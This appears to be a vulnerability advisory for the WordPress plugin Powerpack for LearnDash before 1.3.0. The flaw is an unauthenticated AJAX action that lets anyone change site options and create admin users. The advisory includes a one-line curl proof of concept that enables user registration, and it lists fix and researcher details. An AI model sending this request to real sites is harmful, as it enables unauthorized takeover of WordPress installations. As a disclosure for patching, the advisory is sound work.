Powerpack for LearnDash < 1.3.0 – Unauthenticated Arbitrary Option Update | CVE 2026-2446 | Plugin Vulnerabilities

Description

The plugin does not have authorization and CRSF checks in an AJAX action, allowing unauthenticated users to update arbitrary WordPress options (such as default_role etc) and create arbitrary admin users

Proof of Concept

Enable user registration on the site:

curl -X POST https://example.com/wp-admin/admin-ajax.php \
  -d "action=learndash_save_class_data_ajax" \
  -d "class_name=users_can_register" \
  -d "formData=1"

Affects Plugins

powerpack-for-learndash

Fixed in 1.3.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Submitter website

https://github.com/Nxploited

Submitter twitter

Verified

Yes

WPVDB ID

cbc95cea-e5d4-4874-add6-c8c728b683b7

Timeline

Publicly Published

2026-02-13 (about 21 days ago)

Added

2026-02-13 (about 21 days ago)

Last Updated

2026-02-13 (about 21 days ago)

Other

Published

Title

Published

2026-01-06

Title

Bit Form – Contact Form Plugin < 2.21.7 - Missing Authorization to Unauthenticated Workflow Replay

Published

2025-12-22

Title

Beaver Builder – WordPress Page Builder < 2.9.4.2 - Subscriber+ Arbitrary Beaver Builder Post Update

Published

2025-05-16

Title

WooCommerce POS < 1.7.9 - Missing Authorization

Published

2023-09-29

Title

WP Custom Admin Interface < 7.33 - Missing Authorization to Transients Deletion

Published

2026-01-08

Title

Zorka <= 1.5.7 - Missing Authorization